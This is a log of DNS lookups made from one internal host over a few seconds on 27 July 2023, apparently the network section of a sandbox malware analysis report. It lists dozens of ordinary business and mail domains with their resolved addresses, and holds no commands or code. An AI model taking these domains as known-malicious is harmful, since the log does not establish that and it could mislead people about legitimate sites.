                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.589010954 CEST8.8.8.8192.168.2.40x29bcNo error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.589010954 CEST8.8.8.8192.168.2.40x29bcNo error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.599055052 CEST8.8.8.8192.168.2.40x749dNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.599055052 CEST8.8.8.8192.168.2.40x749dNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.599127054 CEST8.8.8.8192.168.2.40xe28aServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.603780031 CEST8.8.8.8192.168.2.40x183bName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.668658018 CEST8.8.8.8192.168.2.40xe8Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.691395044 CEST8.8.8.8192.168.2.40xbc80No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.894161940 CEST8.8.8.8192.168.2.40x7ca0No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.919884920 CEST8.8.8.8192.168.2.40x7259No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.921494007 CEST8.8.8.8192.168.2.40x5372No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.956367016 CEST8.8.8.8192.168.2.40xd2fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.992305040 CEST8.8.8.8192.168.2.40x5310Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.030483961 CEST8.8.8.8192.168.2.40x2ebdNo error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.056792021 CEST8.8.8.8192.168.2.40xa275No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.056792021 CEST8.8.8.8192.168.2.40xa275No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.156544924 CEST8.8.8.8192.168.2.40xab59No error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.156544924 CEST8.8.8.8192.168.2.40xab59No error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.202241898 CEST8.8.8.8192.168.2.40x4a6No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.396467924 CEST8.8.8.8192.168.2.40x37c6No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.428028107 CEST8.8.8.8192.168.2.40xe63No error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.428028107 CEST8.8.8.8192.168.2.40xe63No error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.435134888 CEST8.8.8.8192.168.2.40x7ebdNo error (0)shittas.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.481158018 CEST8.8.8.8192.168.2.40xd2c3No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.516551971 CEST8.8.8.8192.168.2.40x55e0No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.607650995 CEST8.8.8.8192.168.2.40x3e2eNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.631700993 CEST8.8.8.8192.168.2.40x4df8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.643644094 CEST8.8.8.8192.168.2.40xb32dNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.643644094 CEST8.8.8.8192.168.2.40xb32dNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.643644094 CEST8.8.8.8192.168.2.40xb32dNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.707575083 CEST8.8.8.8192.168.2.40x14e2Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.790544987 CEST8.8.8.8192.168.2.40xba09No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.838551998 CEST8.8.8.8192.168.2.40x1fe6Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.892004967 CEST8.8.8.8192.168.2.40x2805No error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.892004967 CEST8.8.8.8192.168.2.40x2805No error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.931392908 CEST8.8.8.8192.168.2.40xf6d7No error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.931392908 CEST8.8.8.8192.168.2.40xf6d7No error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:00.997906923 CEST8.8.8.8192.168.2.40xd2fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.038712978 CEST8.8.8.8192.168.2.40x7f87No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.053617954 CEST8.8.8.8192.168.2.40xb005No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.072395086 CEST8.8.8.8192.168.2.40xf82No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.095628977 CEST8.8.8.8192.168.2.40x988bNo error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.095628977 CEST8.8.8.8192.168.2.40x988bNo error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.172478914 CEST8.8.8.8192.168.2.40x483fNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.201714993 CEST8.8.8.8192.168.2.40x8d29No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.330218077 CEST8.8.8.8192.168.2.40xe2caNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.330218077 CEST8.8.8.8192.168.2.40xe2caNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.386382103 CEST8.8.8.8192.168.2.40x8050No error (0)oh28ya.com54.248.249.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.386382103 CEST8.8.8.8192.168.2.40x8050No error (0)oh28ya.com54.95.64.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.396744967 CEST8.8.8.8192.168.2.40x2f4eNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.413475037 CEST8.8.8.8192.168.2.40x790cServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.620157003 CEST8.8.8.8192.168.2.40x4df8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.632302046 CEST8.8.8.8192.168.2.40x1c14No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.632302046 CEST8.8.8.8192.168.2.40x1c14No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.679975986 CEST8.8.8.8192.168.2.40x3047No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.679975986 CEST8.8.8.8192.168.2.40x3047No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.745457888 CEST8.8.8.8192.168.2.40x7702No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.776648045 CEST8.8.8.8192.168.2.40x34e1No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.821296930 CEST8.8.8.8192.168.2.40x87b2No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.821296930 CEST8.8.8.8192.168.2.40x87b2No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.821296930 CEST8.8.8.8192.168.2.40x87b2No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.821296930 CEST8.8.8.8192.168.2.40x87b2No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.842945099 CEST8.8.8.8192.168.2.40x7033No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.885579109 CEST8.8.8.8192.168.2.40x2e7bNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:01.885579109 CEST8.8.8.8192.168.2.40x2e7bNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.029892921 CEST8.8.8.8192.168.2.40xd525Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.051659107 CEST8.8.8.8192.168.2.40xd2fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.076690912 CEST8.8.8.8192.168.2.40xb757No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.111223936 CEST8.8.8.8192.168.2.40x2decNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.111637115 CEST8.8.8.8192.168.2.40xebf6No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.135226965 CEST8.8.8.8192.168.2.40xcc7bNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.354747057 CEST8.8.8.8192.168.2.40x2c94No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.391103983 CEST8.8.8.8192.168.2.40xf8c1No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.518903017 CEST8.8.8.8192.168.2.40xafc9No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.522397041 CEST8.8.8.8192.168.2.40x26b5No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.522397041 CEST8.8.8.8192.168.2.40x26b5No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.522397041 CEST8.8.8.8192.168.2.40x26b5No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.522397041 CEST8.8.8.8192.168.2.40x26b5No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.551276922 CEST8.8.8.8192.168.2.40xa127No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.551276922 CEST8.8.8.8192.168.2.40xa127No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.551276922 CEST8.8.8.8192.168.2.40xa127No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.551276922 CEST8.8.8.8192.168.2.40xa127No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.621783018 CEST8.8.8.8192.168.2.40x6418No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.649111986 CEST8.8.8.8192.168.2.40x4df8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.677371025 CEST8.8.8.8192.168.2.40x5cb6No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.691029072 CEST8.8.8.8192.168.2.40x20aeNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.699968100 CEST8.8.8.8192.168.2.40xc056No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.719229937 CEST8.8.8.8192.168.2.40xf37bNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.737284899 CEST8.8.8.8192.168.2.40xd3d7No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.737284899 CEST8.8.8.8192.168.2.40xd3d7No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.737284899 CEST8.8.8.8192.168.2.40xd3d7No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.869973898 CEST8.8.8.8192.168.2.40x6274Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.878340960 CEST8.8.8.8192.168.2.40x3da7No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.878340960 CEST8.8.8.8192.168.2.40x3da7No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.878340960 CEST8.8.8.8192.168.2.40x3da7No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.937199116 CEST8.8.8.8192.168.2.40x38ddNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.949352026 CEST8.8.8.8192.168.2.40x3644Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:02.987224102 CEST8.8.8.8192.168.2.40x2418No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.043253899 CEST8.8.8.8192.168.2.40xf24cName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.063059092 CEST8.8.8.8192.168.2.40xe601No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.200455904 CEST8.8.8.8192.168.2.40x8a29No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.222429037 CEST8.8.8.8192.168.2.40x867bNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.301973104 CEST8.8.8.8192.168.2.40x1616No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.301973104 CEST8.8.8.8192.168.2.40x1616No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.301973104 CEST8.8.8.8192.168.2.40x1616No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.499109983 CEST8.8.8.8192.168.2.40x23caNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.604703903 CEST8.8.8.8192.168.2.40xe09No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.627252102 CEST8.8.8.8192.168.2.40x249dName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.753994942 CEST8.8.8.8192.168.2.40x6805No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.753994942 CEST8.8.8.8192.168.2.40x6805No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.834780931 CEST8.8.8.8192.168.2.40xd3d6No error (0)k-nikko.com52.199.213.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.834780931 CEST8.8.8.8192.168.2.40xd3d6No error (0)k-nikko.com54.150.159.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.847881079 CEST8.8.8.8192.168.2.40x59a6No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.847881079 CEST8.8.8.8192.168.2.40x59a6No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.847881079 CEST8.8.8.8192.168.2.40x59a6No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.847881079 CEST8.8.8.8192.168.2.40x59a6No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.884865046 CEST8.8.8.8192.168.2.40x102eNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.931624889 CEST8.8.8.8192.168.2.40x7ed9No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:03.931624889 CEST8.8.8.8192.168.2.40x7ed9No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.098053932 CEST8.8.8.8192.168.2.40xd2fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.098175049 CEST8.8.8.8192.168.2.40x5a6fNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.197711945 CEST8.8.8.8192.168.2.40xbf60No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.227514982 CEST8.8.8.8192.168.2.40x4b38No error (0)webways.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.227514982 CEST8.8.8.8192.168.2.40x4b38No error (0)webways.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.356172085 CEST8.8.8.8192.168.2.40x645No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.438342094 CEST8.8.8.8192.168.2.40xb092No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.493869066 CEST8.8.8.8192.168.2.40x4605No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.534287930 CEST8.8.8.8192.168.2.40x59bfNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.575500011 CEST8.8.8.8192.168.2.40x586eNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.582593918 CEST8.8.8.8192.168.2.40xff9cNo error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.582593918 CEST8.8.8.8192.168.2.40xff9cNo error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:04.658642054 CEST8.8.8.8192.168.2.40x4df8Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:05.000149012 CEST8.8.8.8192.168.2.40x8037Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:05.129817963 CEST8.8.8.8192.168.2.40x6331Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:05.653141975 CEST8.8.8.8192.168.2.40xeef5Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:05.820214033 CEST8.8.8.8192.168.2.40xf431No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.023689032 CEST8.8.8.8192.168.2.40xd69cNo error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.023689032 CEST8.8.8.8192.168.2.40xd69cNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.023689032 CEST8.8.8.8192.168.2.40xd69cNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.023689032 CEST8.8.8.8192.168.2.40xd69cNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.041548967 CEST8.8.8.8192.168.2.40x8037Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.138789892 CEST8.8.8.8192.168.2.40x78afServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.689078093 CEST8.8.8.8192.168.2.40xeef5Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.789421082 CEST8.8.8.8192.168.2.40x5cd3No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.858370066 CEST8.8.8.8192.168.2.40xb0bcNo error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.959686041 CEST8.8.8.8192.168.2.40x5eb7Name error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:06.964456081 CEST8.8.8.8192.168.2.40x4a49Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.013238907 CEST8.8.8.8192.168.2.40x663bNo error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.013238907 CEST8.8.8.8192.168.2.40x663bNo error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.013766050 CEST8.8.8.8192.168.2.40x364bNo error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.013766050 CEST8.8.8.8192.168.2.40x364bNo error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.024204969 CEST8.8.8.8192.168.2.40x8698Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.027801037 CEST8.8.8.8192.168.2.40x639dNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.032207966 CEST8.8.8.8192.168.2.40x271dNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.032207966 CEST8.8.8.8192.168.2.40x271dNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.032207966 CEST8.8.8.8192.168.2.40x271dNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.032207966 CEST8.8.8.8192.168.2.40x271dNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.062467098 CEST8.8.8.8192.168.2.40xf6c0No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.062467098 CEST8.8.8.8192.168.2.40xf6c0No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.102480888 CEST8.8.8.8192.168.2.40xb1No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.105334044 CEST8.8.8.8192.168.2.40x8037Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.183388948 CEST8.8.8.8192.168.2.40x7800No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.265129089 CEST8.8.8.8192.168.2.40x532cServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
